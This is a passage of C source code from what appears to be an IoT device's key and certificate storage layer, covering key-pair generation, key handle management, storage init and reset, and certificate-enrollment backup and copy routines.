kcm_status = kcm_init();
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "KCM initialization failed\n");
}
//Build complete data name
kcm_status = storage_build_item_name(key_name, key_name_len, key_type, item_prefix_type, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to to build complete name");
//Check if current key exists in the storage
kcm_status = ksa_item_check_existence((const uint8_t *)storage_item_name, key_type);
if (kcm_status == KCM_STATUS_ITEM_NOT_FOUND) {
return kcm_status;
}
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed during ksa_get_existing_entry");
//Get key handle
kcm_status = ksa_key_get_handle((const uint8_t *)storage_item_name, &key_handle);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to get key handle (%d)", kcm_status);
*key_h_out = (kcm_key_handle_t)key_handle;
SA_PV_LOG_INFO_FUNC_EXIT("kcm_item_h_out = %" PRIu32 "", (uint32_t)(*key_h_out));
return kcm_status;
}
kcm_status_e storage_key_close_handle(kcm_key_handle_t *key_handle)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
SA_PV_ERR_RECOVERABLE_RETURN_IF((key_handle == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid key_handle");
SA_PV_LOG_INFO_FUNC_ENTER_NO_ARGS();
if (*key_handle == 0) {
return KCM_STATUS_SUCCESS;
}
kcm_status = ksa_key_close_handle((psa_key_handle_t)*key_handle);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to close key handle (%d)", kcm_status);
//Reset handle value
*key_handle = 0;
SA_PV_LOG_INFO_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
kcm_status_e storage_key_pair_generate_and_store(
const uint8_t *private_key_name,
size_t private_key_name_len,
const uint8_t *public_key_name,
size_t public_key_name_len,
storage_item_prefix_type_e item_prefix_type,
bool is_factory,
const kcm_security_desc_s kcm_item_info)
{
uint8_t storage_priv_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
uint8_t storage_pub_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
kcm_status_e kcm_del_status;
uint8_t pub_key[KCM_EC_SECP256R1_MAX_PUB_KEY_DER_SIZE];
size_t pub_key_size;
ksa_type_location_e prv_key_location = KSA_PSA_TYPE_LOCATION;
ksa_type_location_e pub_key_location = KSA_PSA_TYPE_LOCATION;
SA_PV_LOG_TRACE_FUNC_ENTER_NO_ARGS();
#ifdef MBED_CONF_MBED_CLOUD_CLIENT_SECURE_ELEMENT_SUPPORT
kcm_item_extra_info_s item_extra_info = kcm_item_extra_info_init();
//Set location and location flag
set_item_location(kcm_item_info, &item_extra_info);
kcm_status = check_item_location(item_extra_info.priv_key_location);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), KCM_STATUS_INVALID_PARAMETER, "Wrong item location");
prv_key_location = (item_extra_info.priv_key_location == KCM_LOCATION_PSA) ? KSA_PSA_TYPE_LOCATION : KSA_SECURE_ELEMENT_TYPE_LOCATION;
if (public_key_name != NULL) {
kcm_status = check_item_location(item_extra_info.pub_key_location);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), KCM_STATUS_INVALID_PARAMETER, "Wrong item location");
pub_key_location = (item_extra_info.pub_key_location == KCM_LOCATION_PSA) ? KSA_PSA_TYPE_LOCATION : KSA_SECURE_ELEMENT_TYPE_LOCATION;
}
#else
//kcm_item_info undefined in non-secure element mode
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_info != NULL), KCM_STATUS_INVALID_PARAMETER, "Expected NULL for kcm_item_info");
#endif
//Create complete key names
kcm_status = storage_build_key_pair_item_names(private_key_name, private_key_name_len, public_key_name, public_key_name_len, storage_priv_name, storage_pub_name, item_prefix_type);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to to build complete keys names");
//check if key exists
kcm_status = ksa_item_check_existence((const uint8_t*)storage_priv_name, KCM_PRIVATE_KEY_ITEM);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_ITEM_NOT_FOUND), kcm_status = KCM_STATUS_KEY_EXIST, "The key already exists");
if (public_key_name != NULL) {
//Check if current public exists in the storage
kcm_status = ksa_item_check_existence((const uint8_t *)storage_pub_name, KCM_PUBLIC_KEY_ITEM);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_ITEM_NOT_FOUND), kcm_status = KCM_STATUS_KEY_EXIST, "The key already exists");
}
//Generate and import the generated keypair to PSA slot
kcm_status = ksa_item_store((const uint8_t *)storage_priv_name, 0, KCM_PRIVATE_KEY_ITEM, NULL, 0, prv_key_location, is_factory);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to import the key to PSA slot");
if (public_key_name != NULL) {
// read public key from keypair using kcm complete private name
kcm_status = ksa_item_get_data((const uint8_t *)storage_priv_name, KCM_PUBLIC_KEY_ITEM, pub_key, sizeof(pub_key), &pub_key_size);
SA_PV_ERR_RECOVERABLE_GOTO_IF((kcm_status != KCM_STATUS_SUCCESS), (kcm_status = kcm_status), exit, "failed to export public key from pair");
// store public key using different slot
kcm_status = ksa_item_store((const uint8_t *)storage_pub_name, 0, KCM_PUBLIC_KEY_ITEM, pub_key, pub_key_size, pub_key_location, is_factory);
SA_PV_ERR_RECOVERABLE_GOTO_IF((kcm_status != KCM_STATUS_SUCCESS), (kcm_status = kcm_status), exit, "failed to import public key");
}
exit:
if (kcm_status != KCM_STATUS_SUCCESS) {
// Failed to store public, remove stored private key
kcm_del_status = ksa_item_delete((const uint8_t *)storage_priv_name, KCM_PRIVATE_KEY_ITEM);
if (kcm_del_status != KCM_STATUS_SUCCESS) {
SA_PV_LOG_ERR("failed destorying PSA key during cleanup (%u)", kcm_del_status);
}
}
SA_PV_LOG_TRACE_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
kcm_status_e storage_init(void)
{
SA_PV_LOG_TRACE_FUNC_ENTER_NO_ARGS();
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
kcm_status = storage_build_item_name((const uint8_t*)STORAGE_FACTORY_RESET_IN_PROGRESS_ITEM, strlen(STORAGE_FACTORY_RESET_IN_PROGRESS_ITEM), KCM_CONFIG_ITEM, STORAGE_ITEM_PREFIX_KCM, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build item name");
//check if flag file exist
kcm_status = ksa_item_check_existence((const uint8_t*)storage_item_name, STORAGE_RBP_ITEM);
if (kcm_status == KCM_STATUS_SUCCESS) {
//flag file can be opened for reading
//previous factory reset failed during execution
//call factory reset to complete the process
kcm_status = storage_factory_reset();
}
kcm_status = ksa_init();
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed initializing KSA (kcm_status %d)", kcm_status);
// setting this here will avoid infinite KCM init loop
g_kcm_initialized = true;
#ifdef MBED_CONF_MBED_CLOUD_CLIENT_SECURE_ELEMENT_ATCA_SUPPORT
// Atmel's specific initialization process
kcm_status = storage_psa_se_atmel_init();
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed for storage_psa_se_atmel_init (kcm_status %d)", kcm_status);
kcm_status = storage_psa_se_atmel_load_device_private_key();
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed for storage_psa_se_atmel_load_device_private_key (kcm_status %d)", kcm_status);
kcm_status = storage_psa_se_atmel_create_device_cert_chain();
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed for storage_psa_se_atmel_create_device_cert_chain (kcm_status %d)", kcm_status);
#endif
SA_PV_LOG_TRACE_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
kcm_status_e storage_finalize(void)
{
kcm_status_e kcm_status;
SA_PV_LOG_TRACE_FUNC_ENTER_NO_ARGS();
#ifdef MBED_CONF_MBED_CLOUD_CLIENT_SECURE_ELEMENT_ATCA_SUPPORT
storage_psa_se_atmel_release();
#endif
kcm_status = ksa_fini();
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed finalizing KSA (kcm_status %d)", kcm_status);
SA_PV_LOG_TRACE_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
kcm_status_e storage_reset(void)
{
kcm_status_e kcm_status;
SA_PV_LOG_TRACE_FUNC_ENTER_NO_ARGS();
kcm_status = ksa_reset();
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed for ksa reset");
#ifdef TARGET_LIKE_MBED
psa_status_t psa_status;
/* Go back to an empty storage state
* * In case of non-PSA boards (such as K64F and K66F) with KVSTORE config, this is not really needed, as kv_reset()
* called by storage_reset()) as PSA and RBP items are stored in the same TDBStore. In this case, the call will
* get us from an empty storage state to an empty storage state.
* * In case of a user provided SST, we do not know whether pal_SSTReset() will also remove the PSA storage (probably
* not), so we probably need this call.
* * In case of actual PSA boards, with KVSTORE config, we must call this function so the PSA storage is removed.
* * Irrelevant for PSA over Linux
*/
psa_status = mbed_psa_reboot_and_request_new_security_state(PSA_LIFECYCLE_ASSEMBLY_AND_TEST);
SA_PV_ERR_RECOVERABLE_RETURN_IF((psa_status != PSA_SUCCESS), KCM_STATUS_ERROR, "Failed for mbed_psa_reboot_and_request_new_security_state() (status %" PRIu32 ")", psa_status);
#endif
SA_PV_LOG_TRACE_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
//============================================================CE related APIs===============================================//
kcm_status_e storage_ce_destory_old_active_and_remove_backup_entries(
const uint8_t *private_key_name,
size_t private_key_name_len,
const uint8_t *public_key_name,
size_t public_key_name_len,
const uint8_t *cert_name,
size_t cert_name_len)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_priv_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
uint8_t storage_pub_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
uint8_t storage_cert_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
//uint8_t *kcm_complete_name_pointer = NULL;
kcm_cert_chain_handle chain_handle;
size_t chain_len_out = 0;
size_t max_index = 1;
void* extra_param = NULL;
kcm_chain_cert_info_s cert_name_info = { 0, false };
SA_PV_ERR_RECOVERABLE_RETURN_IF((private_key_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid private_key_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((private_key_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid private_key_name_len");
SA_PV_ERR_RECOVERABLE_RETURN_IF((public_key_name != NULL && public_key_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid public_key_name_len");
SA_PV_LOG_TRACE_FUNC_ENTER("private_key_name = %.*s len = %" PRIu32 "", (int)private_key_name_len, (char*)private_key_name, (uint32_t)private_key_name_len);
//Create complete key names of existing kcm keys with CE item prefix
kcm_status = storage_build_key_pair_item_names(private_key_name, private_key_name_len, public_key_name, public_key_name_len, storage_priv_name, storage_pub_name, STORAGE_ITEM_PREFIX_CE);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build complete keys names");
kcm_status = ksa_destroy_old_active_and_remove_backup_entry((const uint8_t *)storage_priv_name, KCM_PRIVATE_KEY_ITEM);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to clean backup private key");
if (public_key_name != NULL) {
kcm_status = ksa_destroy_old_active_and_remove_backup_entry((const uint8_t *)storage_pub_name, KCM_PUBLIC_KEY_ITEM);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to clean backup private key");
}
//Open chain
kcm_status = storage_cert_chain_open(&chain_handle, cert_name, cert_name_len, STORAGE_ITEM_PREFIX_CE, &chain_len_out);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to open chain");
SA_PV_ERR_RECOVERABLE_GOTO_IF((chain_len_out == 0), kcm_status = KCM_STATUS_INVALID_NUM_OF_CERT_IN_CHAIN, exit, "Invalid chain_len_out");
//certificate chain
if (storage_is_cert_chain(chain_handle) == true || chain_len_out > 1) {
extra_param = (void*)&cert_name_info;
max_index = chain_len_out;
}
for (size_t index = 1; index <= max_index; index++) {
cert_name_info.certificate_index = (uint32_t)index - 1;
if (index == max_index) {
cert_name_info.is_last_certificate = true;
}
//Build name of source item
kcm_status = storage_build_item_name(cert_name, cert_name_len, KCM_CERTIFICATE_ITEM, STORAGE_ITEM_PREFIX_CE, extra_param, storage_cert_name);
SA_PV_ERR_RECOVERABLE_GOTO_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status = kcm_status, exit, "Failed to build complete data name ");
kcm_status = ksa_destroy_old_active_and_remove_backup_entry((const uint8_t *)storage_cert_name, KCM_CERTIFICATE_ITEM);
SA_PV_ERR_RECOVERABLE_GOTO_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status = kcm_status, exit, "Failed to clean backup private key");
}
exit:
//close chain
kcm_status = storage_cert_chain_close(chain_handle, STORAGE_ITEM_PREFIX_CE);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to close chain");
return kcm_status;
}
kcm_status_e storage_ce_key_activate(
const uint8_t *kcm_item_name,
size_t kcm_item_name_len,
kcm_item_type_e kcm_item_type,
storage_item_prefix_type_e item_prefix_type)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_type != KCM_PRIVATE_KEY_ITEM && kcm_item_type != KCM_PUBLIC_KEY_ITEM), KCM_STATUS_INVALID_PARAMETER, "key type not supported");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name_len");
SA_PV_LOG_INFO_FUNC_ENTER("item name = %.*s len = %" PRIu32 "", (int)kcm_item_name_len, (char*)kcm_item_name, (uint32_t)kcm_item_name_len);
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_prefix_type != STORAGE_ITEM_PREFIX_KCM && item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid origin_type");
kcm_status = storage_build_item_name(kcm_item_name, kcm_item_name_len, kcm_item_type, item_prefix_type, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build storage data name");
kcm_status = ksa_activate_ce_key((const uint8_t *)storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to update CE key (%u)", kcm_status);
SA_PV_LOG_INFO_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
kcm_status_e storage_ce_generate_keys(
const uint8_t *private_key_name,
size_t private_key_name_len,
const uint8_t *public_key_name,
size_t public_key_name_len,
kcm_key_handle_t *private_key_handle,
kcm_key_handle_t *public_key_handle)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_priv_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
uint8_t storage_pub_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
uint8_t *p_storage_pub_name = NULL;
SA_PV_ERR_RECOVERABLE_RETURN_IF((private_key_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid private_key_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((private_key_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid private_key_name_len");
SA_PV_ERR_RECOVERABLE_RETURN_IF((public_key_name != NULL && public_key_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid public_key_name_len");
SA_PV_ERR_RECOVERABLE_RETURN_IF((private_key_handle == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid private_key_handle");
SA_PV_ERR_RECOVERABLE_RETURN_IF((public_key_name != NULL && public_key_handle == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid public_key_handle");
SA_PV_LOG_TRACE_FUNC_ENTER("private_key_name = %.*s len = %" PRIu32 "", (int)private_key_name_len, (char*)private_key_name, (uint32_t)private_key_name_len);
//Create complete key names of existing kcm keys
kcm_status = storage_build_key_pair_item_names(private_key_name, private_key_name_len, public_key_name, public_key_name_len, storage_priv_name, storage_pub_name, STORAGE_ITEM_PREFIX_KCM);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build complete keys names");
if (public_key_name != NULL) {
p_storage_pub_name = (uint8_t*)&storage_pub_name;
}
kcm_status = ksa_generate_ce_keys((const uint8_t *)storage_priv_name,
(const uint8_t*)p_storage_pub_name,
(psa_key_handle_t*)private_key_handle,
(psa_key_handle_t*)public_key_handle);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed in ksa_generate_ce_keys");
SA_PV_LOG_INFO_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
kcm_status_e storage_ce_destroy_ce_key(const uint8_t *ce_key_name,
size_t ce_key_name_len,
kcm_item_type_e ce_key_type,
storage_item_prefix_type_e ce_key_prefix_type)
{
uint8_t storage_key_name[STORAGE_COMPLETE_ITEM_NAME_SIZE];
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
SA_PV_ERR_RECOVERABLE_RETURN_IF((ce_key_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid private_key_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((ce_key_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid private_key_name_len");
SA_PV_ERR_RECOVERABLE_RETURN_IF((ce_key_type != KCM_PRIVATE_KEY_ITEM) && (ce_key_type != KCM_PUBLIC_KEY_ITEM), KCM_STATUS_INVALID_PARAMETER, "Invalid private_key_name_len");
//Create complete key names of existing kcm keys
kcm_status = storage_build_item_name(ce_key_name, ce_key_name_len, ce_key_type, ce_key_prefix_type, NULL, storage_key_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build complete keys names");
kcm_status = ksa_destroy_ce_key(storage_key_name, ce_key_type);
return kcm_status;
}
kcm_status_e storage_ce_item_copy(
const uint8_t *kcm_item_name,
size_t kcm_item_name_len,
kcm_item_type_e kcm_item_type,
storage_item_prefix_type_e source_item_prefix_type,
storage_item_prefix_type_e destination_item_prefix_type)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
uint8_t storage_source_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
uint8_t storage_destination_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
kcm_cert_chain_handle kcm_source_chain_handle;
size_t kcm_chain_len_out = 0;
size_t max_index = 1;
void* extra_param = NULL;
kcm_chain_cert_info_s cert_name_info = { 0, false };
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name_len");
SA_PV_LOG_INFO_FUNC_ENTER("item name = %.*s len = %" PRIu32 "", (int)kcm_item_name_len, (char*)kcm_item_name, (uint32_t)kcm_item_name_len);
SA_PV_ERR_RECOVERABLE_RETURN_IF((source_item_prefix_type != STORAGE_ITEM_PREFIX_KCM && source_item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid source_item_prefix_type");
SA_PV_ERR_RECOVERABLE_RETURN_IF((destination_item_prefix_type != STORAGE_ITEM_PREFIX_KCM && destination_item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid destination_item_prefix_type");
/*
Example : copy CE key to original , original is always present!!
old status new status
-------------------------------------------------- -----------------------------------------------
| key name hash | Act ID | Factory ID | Renew ID | | key name hash| Act ID | Factory ID | Renew ID |
--------------------------------------------- ---------------------------------------------
| kcm_key1_hash | 3 | 1 | 0 | | kcm_key1_hash| 1 | 1 | 0 |
------------------------------------------------- ==> --------------------------------------------------
| ce_key1_hash | 1 | 1 | 3 | | ce_key1_hash| 1 | 1 | 0 |
------------------------------------------------- --------------------------------------------------
Example: copy KCM key to CE : backup is new!!
//Creates CE key
old status new status
-------------------------------------------------- -----------------------------------------------
| key name hash | Act ID | Factory ID | Renew ID | | key name hash| Act ID | Factory ID | Renew ID |
--------------------------------------------- =====> ---------------------------------------------
| kcm_key1_hash | 1 | 1 | 3 | | kcm_key1_hash | 1 | 1 | 3 |
------------------------------------------------- -------------------------------------------------
| ce_key1_hash | 1 | 1 | 3 |
------------------------------------------------
*/
//Copy key : copy the content of the source entry fields to destination entry.
if (kcm_item_type == KCM_CERTIFICATE_ITEM) {
//Open chain
kcm_status = storage_cert_chain_open(&kcm_source_chain_handle, kcm_item_name, kcm_item_name_len, source_item_prefix_type, &kcm_chain_len_out);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to open chain");
SA_PV_ERR_RECOVERABLE_GOTO_IF((kcm_chain_len_out == 0), kcm_status = KCM_STATUS_INVALID_NUM_OF_CERT_IN_CHAIN, exit, "Invalid kcm_chain_len_out");
//certificate chain
if (storage_is_cert_chain(kcm_source_chain_handle) == true || kcm_chain_len_out > 1) {
extra_param = (void*)&cert_name_info;
max_index = kcm_chain_len_out;
}
}
for (size_t index = 1; index <= max_index; index++) {
cert_name_info.certificate_index = (uint32_t)index - 1;
if (index == max_index) {
cert_name_info.is_last_certificate = true;
}
//Build name of source item
kcm_status = storage_build_item_name(kcm_item_name, kcm_item_name_len, kcm_item_type, source_item_prefix_type, extra_param, storage_source_name);
SA_PV_ERR_RECOVERABLE_GOTO_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status = kcm_status, exit, "Failed to build complete source data name ");
SA_PV_LOG_BYTE_BUFF_TRACE("storage_source_name: ", storage_source_name, STORAGE_COMPLETE_ITEM_NAME_SIZE);
//Build name of destination item
kcm_status = storage_build_item_name(kcm_item_name, kcm_item_name_len, kcm_item_type, destination_item_prefix_type, extra_param, storage_destination_name);
SA_PV_ERR_RECOVERABLE_GOTO_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status = kcm_status, exit, "Failed to build complete destination data name ");
SA_PV_LOG_BYTE_BUFF_TRACE("storage_destination_name: ", storage_destination_name, STORAGE_COMPLETE_ITEM_NAME_SIZE);
//Copy existing source item to a new destination item
kcm_status = ksa_copy_item((const uint8_t *)storage_source_name, kcm_item_type, (const uint8_t *)storage_destination_name);
SA_PV_ERR_RECOVERABLE_GOTO_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status = kcm_status, exit, "Failed to copy an item");
}
exit:
if (kcm_item_type == KCM_CERTIFICATE_ITEM) {
//close chain
kcm_status = storage_cert_chain_close(kcm_source_chain_handle, source_item_prefix_type);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to close chain");
}
SA_PV_LOG_INFO_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
kcm_status_e storage_ce_clean_item(
const uint8_t *kcm_item_name,
size_t kcm_item_name_len,
kcm_item_type_e kcm_item_type,
storage_item_prefix_type_e item_prefix_type,
bool clean_active_item_only)
{
kcm_status_e kcm_status = KCM_STATUS_SUCCESS;
kcm_cert_chain_handle chain_handle;
size_t chain_len_out = 0;
size_t max_index = 1;
void* extra_param = NULL;
kcm_chain_cert_info_s cert_name_info = { 0, false };
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_type != KCM_PRIVATE_KEY_ITEM && kcm_item_type != KCM_PUBLIC_KEY_ITEM && kcm_item_type != KCM_CERTIFICATE_ITEM), KCM_STATUS_INVALID_PARAMETER, "key type not supported");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid kcm_item_name_len");
SA_PV_LOG_INFO_FUNC_ENTER("item name = %.*s len = %" PRIu32 "", (int)kcm_item_name_len, (char*)kcm_item_name, (uint32_t)kcm_item_name_len);
SA_PV_ERR_RECOVERABLE_RETURN_IF((item_prefix_type != STORAGE_ITEM_PREFIX_KCM && item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid item_prefix_type");
if (kcm_item_type == KCM_CERTIFICATE_ITEM) {
//Open chain
kcm_status = storage_cert_chain_open(&chain_handle, kcm_item_name, kcm_item_name_len, item_prefix_type, &chain_len_out);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to open chain");
SA_PV_ERR_RECOVERABLE_GOTO_IF((chain_len_out == 0), kcm_status = KCM_STATUS_INVALID_NUM_OF_CERT_IN_CHAIN, exit, "Invalid chain_len_out");
//certificate chain
if (storage_is_cert_chain(chain_handle) == true || chain_len_out > 1) {
extra_param = (void*)&cert_name_info;
max_index = chain_len_out;
}
}
for (size_t index = 1; index <= max_index; index++) {
cert_name_info.certificate_index = (uint32_t)index - 1;
if (index == max_index) {
cert_name_info.is_last_certificate = true;
}
kcm_status = storage_build_item_name(kcm_item_name, kcm_item_name_len, kcm_item_type, item_prefix_type, extra_param, storage_item_name);
SA_PV_ERR_RECOVERABLE_GOTO_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status = kcm_status, exit, "Failed to build complete source data name ");
SA_PV_LOG_TRACE("item name = %.*s", (int)STORAGE_COMPLETE_ITEM_NAME_SIZE, (char*)storage_item_name);
kcm_status = ksa_remove_entry((const uint8_t*)storage_item_name, kcm_item_type, clean_active_item_only);
SA_PV_ERR_RECOVERABLE_GOTO_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status = kcm_status, exit, "Failed to remove the key ");
}
exit:
if (kcm_item_type == KCM_CERTIFICATE_ITEM) {
//close chain
kcm_status = storage_cert_chain_close(chain_handle, item_prefix_type);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to close chain");
}
SA_PV_LOG_INFO_FUNC_EXIT_NO_ARGS();
return kcm_status;
}
//=================================================Secure element related implementation==============================//
#ifdef MBED_CONF_MBED_CLOUD_CLIENT_SECURE_ELEMENT_SUPPORT
kcm_status_e storage_item_get_location(const uint8_t *kcm_item_name,
size_t kcm_item_name_len,
kcm_item_type_e kcm_item_type,
storage_item_prefix_type_e kcm_item_prefix_type,
kcm_item_location_e *kcm_item_location_out)
{
kcm_status_e kcm_status;
uint8_t storage_item_name[STORAGE_COMPLETE_ITEM_NAME_SIZE] = { 0 };
SA_PV_LOG_TRACE_FUNC_ENTER_NO_ARGS();
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid item name");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_name_len == 0), KCM_STATUS_INVALID_PARAMETER, "Invalid item name length");
SA_PV_LOG_TRACE_FUNC_ENTER("item name = %.*s len = %" PRIu32 "", (int)kcm_item_name_len, (char*)kcm_item_name, (uint32_t)kcm_item_name_len);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_prefix_type != STORAGE_ITEM_PREFIX_KCM && kcm_item_prefix_type != STORAGE_ITEM_PREFIX_CE), KCM_STATUS_INVALID_PARAMETER, "Invalid item_source_type");
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_item_location_out == NULL), KCM_STATUS_INVALID_PARAMETER, "Invalid item_location_out");
kcm_status = storage_build_item_name(kcm_item_name, kcm_item_name_len, kcm_item_type, kcm_item_prefix_type, NULL, storage_item_name);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed to build complete data name");
kcm_status = ksa_get_item_location((const uint8_t *)storage_item_name, kcm_item_type, kcm_item_location_out);
SA_PV_ERR_RECOVERABLE_RETURN_IF((kcm_status != KCM_STATUS_SUCCESS), kcm_status, "Failed getting the key location");
